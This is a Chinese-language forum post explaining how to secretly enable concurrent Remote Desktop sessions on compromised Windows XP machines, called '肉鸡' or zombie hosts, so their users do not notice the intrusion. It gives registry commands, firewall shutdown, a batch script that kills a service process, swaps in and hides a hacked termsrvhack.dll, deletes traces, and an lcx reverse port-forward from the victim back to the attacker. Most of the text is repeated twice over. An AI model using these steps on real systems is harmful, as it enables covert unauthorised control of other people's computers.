首页
欢迎页
Latest images
搜索
注册
登录关于XP系统内外网双开3389方法。
关于XP系统内外网双开3389方法。
POLARBEAR 周日 八月 05, 2012 5:20 am
对于Server2003系统来说,开3389远程是可以多用户的,可以在组策略设置连接数量。而对于一般的XP系统正常模式下只支持单开3389,也就是说对方正在使用时候,你突然登录3389就会将对方挤出桌面。即可被对方发现Administrator被其它计算机连接。我们必须通过一种技术对XP进行双开模式,即对方正在使用,我们照样连接3389,下面我介绍两种双开外网3389与一种内网转发端口双开3389的技术。首先这里先说下如何使肉鸡开启3389端口,我们使用下面的命令:
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t
REG_DWORD /d 0 /f
此条命令可以将肉鸡的3389打开,同时如果肉鸡没有开依赖服务“Terminal Services” 。则我们命令:net start “Terminal Services”
即可开启依赖服务:Terminal Services。
这仅此达到开启3389端口的方法,当然后面就需要你建账户以及提权进入了。这仅仅达到单开3389,下面讲解下双开方法。
外网
2.种外网双开3389方法:
外网:
工 具:使用ANS提供的SK3389软件
1. DOS关闭防火墙:net stop sharedaccess
2. 利用ANS联盟提供的SK3389传输要肉鸡的C盘中,对该软件执行隐藏运行即可,最后进行一个创建用户以及提权达到双开3389目的。
第二种:
外网:
工具:XP3389 、3389.bat、 termsrvhack.dll
1.关闭防火墙:net stop sharedaccess 。
2.将XP3389 和termsrvhack.dll 传到肉鸡C盘中。
3.远程肉鸡CMD查看远程进程的PID值 :tasklist /svc >> c:\3389.txt (意思:为将远程进程内容输入到C盘3389.txt中)。
4.寻找服务名关于Dnscache的值 一般情况下该后面还会有一个数值为:TermServic ,即:
Dnscache TermServic (或者是:DcomLaunch, TermService) 。关于该服务值的进程一般为Svchost。假设只有Dnscache则只能单开
3389了。找到该符合条件的svchost进程后复制其PID值,进行下一步。
5.修改3389.bat的PID 值。如下代码将第二行:852为需要修改的PID值,将刚才获取的PID值进行修改,最后切换到该批处理位置直接执行CMD命 令:3389.bat 。 关于: 3389.bat的批处理代码如下:
@echo off
@ntsd -c q -p “852”
@REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Winlogon /v KeepRASConnections
/t REG_SZ /d 1 /f
@REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t
REG_DWORD /d 00000000 /f
@REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Licensing" "Core /v
EnableConcurrentSessions /t REG_DWORD /d 00000001 /f
@REG ADD HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters /v ServiceDll /t
REG_EXPAND_SZ /d %SystemRoot%\System32\termsrvhack.dll /f
@copy c:\termsrvhack.dll c:\windows\system32\termsrvhack.dll
@Attrib +H +S +R C:\windows\system32\termsrvhack.dll
@shutdown -a
@del c:\termsrvhack.dll
@del c:\3389.txt
@net stop sharedaccess
@net start dcomlaunch
@net start termservice
我利用DOS知识对上面这段代码翻译一遍,让大家更懂得其含义:
@echo off
rem 关闭回显
@ntsd -c q -p 852
rem 杀掉pid号为852的进程。
@REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Winlogon /v KeepRASConnections
/t REG_SZ /d 1 /f
rem 保证切换系统用户帐号后,先前已经建立好的宽带拨号连接不会rem 自行断开。
:::::::::::::为开远程桌面连接服务做准备::::::::::::::::
: :{
@REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t
REG_DWORD /d 00000000 /f
@REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Licensing" "Core /v
EnableConcurrentSessions /t REG_DWORD /d
00000001 /f
@REG ADD HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters /v ServiceDll /t
REG_EXPAND_SZ /d %SystemRoot%
\System32\termsrvhack.dll /f
::}
:::::::::::::为开远程桌面连接服务做准备::::::::::::::::
@copy c:\termsrvhack.dll c:\windows\system32\termsrvhack.dll
rem 把c盘根目录下的termsrvhack.dll拷贝到system32目录下
@Attrib +H +S +R C:\windows\system32\termsrvhack.dll
rem 把system32目录下的termsrvhack.dll加上隐藏,系统和只读属rem 性,这样就不容易被删除。
@shutdown -a
rem 取消关机
@del c:\termsrvhack.dll
rem 删除c盘根目录下的termsrvhack.dll
@del c:\3389.txt
rem 删除c盘根目录下的3389.txt
@net stop sharedaccess
rem 关闭防火墙
@net start dcomlaunch
rem 启动 dcomlaunch服务(与RPC有莫大关系)
@net start termservice
rem 启动远程桌面连接服务
这样就达到了双开3389的目的,一般成功的话运行结果一般如下所示:
运行结果一般如下:
操作成功
操作成功
操作成功
操作成功已复制 1 个文件。
没有启动 Windows Firewall/Internet Connection Sharing (ICS) 服务。
请键入 NET HELPMSG 3521 以获得更多的帮助。
D** Server Process Launcher 服务正在启动 .
D** Server Process Launcher 服务已经启动成功。
Terminal Services 服务正在启动 .
Terminal Services 服务已经启动成功。
内网:
关于内网比较麻烦,因为肉鸡的内网没有映射3389端口,所以双开起来是比较麻烦的,我们可以利用lcx转发工具进行一个双
开3389 。
工具: lcx.exe端口转发工具
需要命令:(本地:lcx –listen 51 33891)
(肉鸡:lcx –slave 本机外网IP 肉鸡内网IP 3389)
此时你应该是外网,如果您是内网需要映射51与3389端口。
1.lcx放入到本地D盘,并且在该盘下创建bat处理。代码是cmd.exe 即在D盘下的cmd命令提示符。
2.将lcx.exe传入到肉鸡的C盘中。
3.利用ipconfig /all 查看肉鸡IP并且记录全部信息。
4.本地转发端口:将51端口转发为33891端口。
5.本地进入D盘的创建的CMD中运行命令进行51端口转发为33891端口:输入命令:lcx -listen 51 33891 (此时正在监听51端口中....)
成功的提示为:
第一条和第三配合使用。如在本机上监听 -listen 51 3389,在肉鸡上运行-slave 本机ip
在肉鸡上运行-slave 本机ip 51 肉鸡ip 3389
[Usage of Packet Transmit:]
lcx -<listen|tran|slave> <option> [-log logfile]
[option;]
-listen <ConnectPort> <TransmitPort>
-tran <ConnectPort> <TransmitHost> <TransmitPort>
-slave <ConnectHost> <ConnectPort> <TransmitHost> <TransmitPort>
6.肉鸡CMD运行:由于lcx在肉鸡的C盘中,远程CMD切换对方的盘符到lcx的C盘之中。再运行命令:lcx –slave 本机外网IP 肉鸡内网IP 3389
当出现字样为以下表示成功:
Make a Connection to 192.168.*.*:51…. 正在建立连接
7.输入肉鸡外网IP进行3389连接即可。
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t
REG_DWORD /d 0 /f
此条命令可以将肉鸡的3389打开,同时如果肉鸡没有开依赖服务“Terminal Services” 。则我们命令:net start “Terminal Services”
即可开启依赖服务:Terminal Services。
这仅此达到开启3389端口的方法,当然后面就需要你建账户以及提权进入了。这仅仅达到单开3389,下面讲解下双开方法。
外网
2.种外网双开3389方法:
外网:
工 具:使用ANS提供的SK3389软件
1. DOS关闭防火墙:net stop sharedaccess
2. 利用ANS联盟提供的SK3389传输要肉鸡的C盘中,对该软件执行隐藏运行即可,最后进行一个创建用户以及提权达到双开3389目的。
第二种:
外网:
工具:XP3389 、3389.bat、 termsrvhack.dll
1.关闭防火墙:net stop sharedaccess 。
2.将XP3389 和termsrvhack.dll 传到肉鸡C盘中。
3.远程肉鸡CMD查看远程进程的PID值 :tasklist /svc >> c:\3389.txt (意思:为将远程进程内容输入到C盘3389.txt中)。
4.寻找服务名关于Dnscache的值 一般情况下该后面还会有一个数值为:TermServic ,即:
Dnscache TermServic (或者是:DcomLaunch, TermService) 。关于该服务值的进程一般为Svchost。假设只有Dnscache则只能单开
3389了。找到该符合条件的svchost进程后复制其PID值,进行下一步。
5.修改3389.bat的PID 值。如下代码将第二行:852为需要修改的PID值,将刚才获取的PID值进行修改,最后切换到该批处理位置直接执行CMD命 令:3389.bat 。 关于: 3389.bat的批处理代码如下:
@echo off
@ntsd -c q -p “852”
@REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Winlogon /v KeepRASConnections
/t REG_SZ /d 1 /f
@REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t
REG_DWORD /d 00000000 /f
@REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Licensing" "Core /v
EnableConcurrentSessions /t REG_DWORD /d 00000001 /f
@REG ADD HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters /v ServiceDll /t
REG_EXPAND_SZ /d %SystemRoot%\System32\termsrvhack.dll /f
@copy c:\termsrvhack.dll c:\windows\system32\termsrvhack.dll
@Attrib +H +S +R C:\windows\system32\termsrvhack.dll
@shutdown -a
@del c:\termsrvhack.dll
@del c:\3389.txt
@net stop sharedaccess
@net start dcomlaunch
@net start termservice
我利用DOS知识对上面这段代码翻译一遍,让大家更懂得其含义:
@echo off
rem 关闭回显
@ntsd -c q -p 852
rem 杀掉pid号为852的进程。
@REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Winlogon /v KeepRASConnections
/t REG_SZ /d 1 /f
rem 保证切换系统用户帐号后,先前已经建立好的宽带拨号连接不会rem 自行断开。
:::::::::::::为开远程桌面连接服务做准备::::::::::::::::
: :{
@REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t
REG_DWORD /d 00000000 /f
@REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Licensing" "Core /v
EnableConcurrentSessions /t REG_DWORD /d
00000001 /f
@REG ADD HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters /v ServiceDll /t
REG_EXPAND_SZ /d %SystemRoot%
\System32\termsrvhack.dll /f
::}
:::::::::::::为开远程桌面连接服务做准备::::::::::::::::
@copy c:\termsrvhack.dll c:\windows\system32\termsrvhack.dll
rem 把c盘根目录下的termsrvhack.dll拷贝到system32目录下
@Attrib +H +S +R C:\windows\system32\termsrvhack.dll
rem 把system32目录下的termsrvhack.dll加上隐藏,系统和只读属rem 性,这样就不容易被删除。
@shutdown -a
rem 取消关机
@del c:\termsrvhack.dll
rem 删除c盘根目录下的termsrvhack.dll
@del c:\3389.txt
rem 删除c盘根目录下的3389.txt
@net stop sharedaccess
rem 关闭防火墙
@net start dcomlaunch
rem 启动 dcomlaunch服务(与RPC有莫大关系)
@net start termservice
rem 启动远程桌面连接服务
这样就达到了双开3389的目的,一般成功的话运行结果一般如下所示:
运行结果一般如下:
操作成功
操作成功
操作成功
操作成功已复制 1 个文件。
没有启动 Windows Firewall/Internet Connection Sharing (ICS) 服务。
请键入 NET HELPMSG 3521 以获得更多的帮助。
D** Server Process Launcher 服务正在启动 .
D** Server Process Launcher 服务已经启动成功。
Terminal Services 服务正在启动 .
Terminal Services 服务已经启动成功。
内网:
关于内网比较麻烦,因为肉鸡的内网没有映射3389端口,所以双开起来是比较麻烦的,我们可以利用lcx转发工具进行一个双
开3389 。
工具: lcx.exe端口转发工具
需要命令:(本地:lcx –listen 51 33891)
(肉鸡:lcx –slave 本机外网IP 肉鸡内网IP 3389)
此时你应该是外网,如果您是内网需要映射51与3389端口。
1.lcx放入到本地D盘,并且在该盘下创建bat处理。代码是cmd.exe 即在D盘下的cmd命令提示符。
2.将lcx.exe传入到肉鸡的C盘中。
3.利用ipconfig /all 查看肉鸡IP并且记录全部信息。
4.本地转发端口:将51端口转发为33891端口。
5.本地进入D盘的创建的CMD中运行命令进行51端口转发为33891端口:输入命令:lcx -listen 51 33891 (此时正在监听51端口中....)
成功的提示为:
第一条和第三配合使用。如在本机上监听 -listen 51 3389,在肉鸡上运行-slave 本机ip
在肉鸡上运行-slave 本机ip 51 肉鸡ip 3389
[Usage of Packet Transmit:]
lcx -<listen|tran|slave> <option> [-log logfile]
[option;]
-listen <ConnectPort> <TransmitPort>
-tran <ConnectPort> <TransmitHost> <TransmitPort>
-slave <ConnectHost> <ConnectPort> <TransmitHost> <TransmitPort>
6.肉鸡CMD运行:由于lcx在肉鸡的C盘中,远程CMD切换对方的盘符到lcx的C盘之中。再运行命令:lcx –slave 本机外网IP 肉鸡内网IP 3389
当出现字样为以下表示成功:
Make a Connection to 192.168.*.*:51…. 正在建立连接
7.输入肉鸡外网IP进行3389连接即可。
POLARBEAR- 帖子数 : 117
注册日期 : 12-07-25
您在这个论坛的权限:
您不能在这个论坛回复主题